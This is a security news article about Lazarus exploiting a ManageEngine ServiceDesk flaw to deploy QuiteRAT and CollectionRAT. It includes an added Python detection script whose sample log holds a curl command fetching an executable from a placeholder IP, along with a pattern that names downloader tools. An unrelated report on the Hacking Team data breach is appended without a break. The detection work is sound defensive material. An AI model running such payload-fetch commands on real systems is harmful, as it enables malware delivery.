Lazarus Employs Public ManageEngine Exploit to Breach Internet Firms


The North Korean state-backed hacking group Lazarus has been compromising an internet backbone infrastructure provider and healthcare organisations by exploiting a major flaw (CVE-2022-47966) in Zoho's ManageEngine ServiceDesk. 

The attacks kicked off earlier this year with the goal of infiltrating companies in the United States and the UK in order to disseminate the QuiteRAT malware and a newly found remote access trojan (RAT) known as CollectionRAT. 

CollectionRAT was discovered after researchers analysed the infrastructure employed by the campaigns, which the threat actor had previously used for past assaults. 

Targeting internet firms 

Researchers at Cisco Talos observed attacks against UK internet enterprises in early 2023 when Lazarus exploited CVE-2022-47966, a pre-authentication remote code execution bug impacting numerous Zoho ManageEngine products.

"In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access," researchers at Cisco Talos stated. 

According to the analysts, Lazarus began exploiting the flaw just five days after the exploit became public. Multiple threat actors used the exploit in attacks, as observed by Rapid7, Shadowserver, and GreyNoise, prompting CISA to issue a warning to organisations.

Lazarus hackers dropped the QuiteRAT malware from an external URL after exploiting the vulnerability to infiltrate a target.
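The payload-fetch step described above (a web application process pulling a binary from an external URL after exploitation) is one place a defender can catch this chain at the process-creation layer. The following is an added example, not code from Cisco Talos or the original post; the ServiceDesk install path, the log format and the log lines are all constructed for illustration.

```python
"""Flag process-creation events where a ManageEngine ServiceDesk process spawns
a child that downloads from a URL (added example; all values are constructed)."""
import re
from dataclasses import dataclass

# Assumption: ServiceDesk is installed here; adjust to the real install location.
SERVICEDESK_PATH = r"C:\ManageEngine\ServiceDesk"

# Child commands commonly used to fetch a remote payload; a heuristic, not an exhaustive list.
DOWNLOADER_RE = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|powershell|pwsh)\b.*?https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def is_suspicious(ev: ProcessEvent) -> bool:
    """True when a process under the ServiceDesk tree spawns a child that downloads from a URL."""
    parent_in_servicedesk = ev.parent_image.lower().startswith(SERVICEDESK_PATH.lower())
    return parent_in_servicedesk and DOWNLOADER_RE.search(ev.command_line) is not None


# Constructed sample log: one download from a documentation-range IP, one benign
# child of ServiceDesk, and one download that is not a child of ServiceDesk.
SAMPLE_LOG = """\
ParentImage=C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c curl -o C:\\Windows\\Temp\\upd.exe http://203.0.113.10/upd.exe
ParentImage=C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|Image=C:\\Windows\\System32\\whoami.exe|CommandLine=whoami
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl https://example.com/index.html
"""


def flag_events(log_text: str) -> list[ProcessEvent]:
    """Return the events in the log that match the ServiceDesk-spawns-downloader rule."""
    events = (parse_event(line) for line in log_text.splitlines() if line.strip())
    return [ev for ev in events if is_suspicious(ev)]


if __name__ == "__main__":
    for ev in flag_events(SAMPLE_LOG):
        print(f"SUSPICIOUS: {ev.parent_image} -> {ev.command_line}")
```

The second sample line shows the rule's limit: a ServiceDesk child that runs reconnaissance without fetching anything is not flagged, so this check complements rather than replaces web-server request logging and patching.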

QuiteRAT, found in February 2023, is described as a basic yet powerful remote access trojan that appears to be a step up from the more well-known MagicRAT, which Lazarus deployed in the second half of 2022 to target energy suppliers.

The malware's code is leaner than MagicRAT's, and careful library selection has reduced its size from 18MB to 4MB while preserving the same set of functions, researchers added.

New Lazarus malware 

In a separate report published earlier this week, Cisco Talos stated that Lazarus hackers had developed a new malware known as CollectionRAT, which is related to the "EarlyRAT" family. The new threat was discovered when experts examined the infrastructure employed by the actor in earlier operations.

CollectionRAT's features include arbitrary command execution, file management, gathering system information, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. 

Another intriguing feature of CollectionRAT is its use of the Microsoft Foundation Class (MFC) framework, which allows it to decrypt and execute code on the fly, elude detection, and frustrate analysis. 

Cisco Talos observed further signs of evolution in Lazarus' tactics, techniques, and procedures, including the extensive use of open-source tools and frameworks such as Mimikatz for credential theft, PuTTY Link (Plink) for remote tunnelling, and DeimosC2 for command and control communication.

This strategy makes it difficult to attribute, monitor, and create efficient defences because Lazarus leaves behind fewer identifiable traces.

An unidentified group stole 400 GB data from Hacking Team

An unidentified group of hackers stole 400 GB worth of confidential data from the Hacking Team, which provides effective, easy-to-use offensive technology to the worldwide law enforcement and intelligence communities.

According to a report published on WeLiveSecurity, the attack started late at night on July 6. Weak passwords are said to be a possible reason behind the leak.

“Passwords are also contained in the leaked documents, including the login for the company’s official Twitter account which was used by the attackers to publish confidential information. The attackers posted private emails from company employees to Twitter, as well as a link from where anybody can download the 400GB file,” the report read.

The company's officials came to know about the attack only the next morning.

Christian Pozzi, a security engineer, confirmed the attack on July 7, stating: "We are awake. The people responsible for this will be arrested. We are working with the police at the moment."

The researchers suggested that the company, which develops surveillance tools and sells them to various organisations across the world, may have been targeted for that reason.

J. Prasanna, founder of the Cyber Security & Privacy Foundation, said Hacking Team has been accused of selling software used to hack into people for the last few years, and that it appears to have supplied countries with dictatorial regimes, where people are targeted by the government.

"Maybe an activist group would have hacked into the servers of Hacking Team," opined Prasanna.

"Companies can make such tools, but they should be sold responsibly to democratic regimes, and such monitoring should be subject to a court warrant. They should never be sold to countries which commit human rights violations," he added.

He added that there is always a weak element in security.

"There may have been zero-day vulnerabilities which hackers could have exploited," he said.

Regarding the impact of the attack, Prasanna said that many countries or governments that dealt with the company and bought this software would be exposed.

“Today, many governments and companies are hungry for information on people/corporations/governments. So they hire hackers or software that does hacking,” Prasanna concluded.